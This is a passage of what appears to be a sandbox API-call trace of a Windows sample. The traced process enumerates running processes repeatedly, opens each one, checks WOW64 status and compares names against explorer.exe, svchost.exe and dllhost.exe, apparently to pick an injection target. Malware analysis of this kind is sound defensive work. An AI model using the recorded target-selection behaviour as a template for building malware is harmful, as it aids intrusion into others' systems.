th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0193.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0193.414] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.414] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.414] CloseHandle (hObject=0xec) returned 1 [0193.414] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0193.414] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0193.414] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0193.414] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0193.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0193.415] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.415] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.415] CloseHandle (hObject=0xec) returned 1 [0193.415] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0193.415] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0193.415] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0193.415] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0193.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0193.416] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0193.416] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0193.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0193.417] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0193.418] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0193.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0193.418] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0193.419] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0193.419] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.419] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.419] CloseHandle (hObject=0xec) returned 1 [0193.419] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0193.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0193.420] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.420] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.420] CloseHandle (hObject=0xec) returned 1 [0193.420] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0193.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0193.420] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0193.421] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.421] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.421] CloseHandle (hObject=0xec) returned 1 [0193.421] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0193.421] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0193.421] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.422] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.422] CloseHandle (hObject=0xec) returned 1 [0193.422] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.422] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0193.423] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.423] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.423] CloseHandle (hObject=0xec) returned 1 [0193.423] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0193.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0193.423] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.423] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.423] CloseHandle (hObject=0xec) returned 1 [0193.423] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0193.423] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0193.423] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0193.423] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0193.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0193.424] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0193.424] CloseHandle (hObject=0xe8) returned 1 [0193.425] Sleep (dwMilliseconds=0x3e8) [0194.462] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0194.464] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0194.465] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0194.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0194.466] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0194.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0194.466] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0194.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0194.467] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0194.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0194.467] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0194.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0194.468] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0194.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0194.468] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0194.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0194.469] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0194.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0194.469] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0194.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0194.470] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0194.470] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0194.471] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0194.471] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0194.472] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0194.472] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0194.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0194.473] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0194.473] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0194.474] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0194.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0194.474] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.474] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.474] CloseHandle (hObject=0xec) returned 1 [0194.474] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0194.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0194.475] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0194.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0194.475] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.475] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.475] CloseHandle (hObject=0xec) returned 1 [0194.475] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0194.476] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0194.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0194.476] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0194.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0194.477] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.477] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.477] CloseHandle (hObject=0xec) returned 1 [0194.477] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0194.477] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0194.477] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0194.477] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0194.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0194.478] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.478] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.478] CloseHandle (hObject=0xec) returned 1 [0194.478] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0194.478] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0194.478] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0194.478] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0194.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0194.478] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.478] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.478] CloseHandle (hObject=0xec) returned 1 [0194.479] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0194.479] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0194.479] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0194.479] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0194.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0194.479] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.479] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.479] CloseHandle (hObject=0xec) returned 1 [0194.479] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0194.479] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0194.479] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0194.479] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0194.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0194.480] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.480] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.480] CloseHandle (hObject=0xec) returned 1 [0194.480] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0194.480] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0194.480] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0194.480] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0194.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0194.481] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.481] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.481] CloseHandle (hObject=0xec) returned 1 [0194.481] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0194.481] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0194.481] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0194.481] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0194.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0194.481] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.481] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.481] CloseHandle (hObject=0xec) returned 1 